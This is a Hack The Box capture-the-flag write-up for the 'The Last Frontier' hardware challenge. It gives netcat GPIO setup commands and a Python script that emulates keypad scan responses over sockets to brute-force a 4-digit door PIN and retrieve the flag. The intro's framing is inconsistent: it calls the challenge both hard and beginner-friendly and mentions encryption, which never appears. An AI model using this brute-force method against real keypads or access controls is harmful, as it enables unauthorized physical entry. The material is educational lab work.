Post

HackTheBox The Last Frontier Writeup

Explore the basics of cybersecurity in the The Last Frontier Challenge on Hack The Box. This hard-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/779

Description

You’ve navigated past the main defenses, but there’s one more hurdle: an air-gapped security keypad guarding the lab. We already tried up until the 5000 passcode but we did not manage to open it. We need a faster way to go through all the 4-digit passcodes. Luckily, we’ve exposed some traces on the device’s keypad. Since it’s air-gapped, you’ll need to manually manipulate these pins to mimic the correct keypress sequence. Understanding circuit behavior and exploiting potential vulnerabilities in the hardware is key. Carefully manipulate the pins to unlock the door without triggering any alarms. This is your final step to securing the patch for distribution across the city. To aid in your mission, we have created a remote command and control interface for our custom module connected to the security keypad’s traces. The schematic we’ve drafted based on the device’s keypad configuration should be enough to get you started. (To enter a passcode send # it at the end)

Exploitation

Connect with nc and Setup the gpio

1
2
3
4
5
6
#cmd> comm-module-id
#id> 35
#Module ID set to 35
#cmd> GPIO
#set> 1 0
#GPIO-1 set to: 0

Disconnect and After

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
import socket
import time
import sys

if len(sys.argv) < 2:
    print(f"Usage: python {sys.argv[0]} <ip:port1,port2>")
    sys.exit(1)

host, ports_str = sys.argv[1].split(':')
ports = [int(port) for port in ports_str.split(',')]

key_presses = '5254#'
current_key_to_send = 0
keymap = {
    '1': ['E0', '0E'], '2': ['D0', '0E'], '3': ['B0', '0E'], 'A': ['70', '0E'],
    '4': ['E0', '0D'], '5': ['D0', '0D'], '6': ['B0', '0D'], 'B': ['70', '0D'],
    '7': ['E0', '0B'], '8': ['D0', '0B'], '9': ['B0', '0B'], 'C': ['70', '0B'],
    '*': ['E0', '07'], '0': ['D0', '07'], '#': ['B0', '07'], 'D': ['70', '07']
}

def interact_with_nc(sock_nc):
    sock_nc.sendall(b"system\n")
    time.sleep(0.5)
    response = sock_nc.recv(4096).decode('utf-8')
    print("Received from NC server:", response)
    return 'HTB{' in response

def simulate_keypad_read(command):
    global current_key_to_send
    if command == 'F0':
        key = key_presses[current_key_to_send]
        return keymap[key][0] + '\n'
    elif command == '0F':
        key = key_presses[current_key_to_send]
        current_key_to_send += 1
        return keymap[key][1] + '\n'
    else:
        return 'FF\n'

def run_client(server_host, server_port):
    global key_presses, current_key_to_send
    sock_nc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_nc.connect((host, ports[0]))
    print("Connected to NC server.")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((server_host, server_port))
        print("Connected to server")
        for pin in range(5000, 5254):
            key_presses = f"{pin:04d}#"
            print(key_presses)
            current_key_to_send = 0
            while True:
                data = sock.recv(1024).decode('utf-8').strip()
                if not data:
                    print("Server closed the connection")
                    break
                print(f"Received from server: {data}")
                response = simulate_keypad_read(data)
                if response:
                    sock.sendall(response.encode('utf-8'))
                if len(key_presses) == current_key_to_send:
                    break
                if data == 'quit': 
                    print("Quit command received")
                    break
            interact_with_nc(sock_nc)

if __name__ == "__main__":
    run_client(host, ports[1])

Wait for the pin to be bruteforced and it will reveal the flag

Summary

The The Last Frontier Challenge on Hack The Box is a hard-level challenge that focuses on advanced hardware manipulation and network communication. Participants configure GPIO settings via command-line, utilize socket programming to automate network interactions, and conduct a brute-force attack to decode a PIN. This challenge effectively combines hardware control with practical cybersecurity techniques.

This post is licensed under CC BY 4.0 by the author.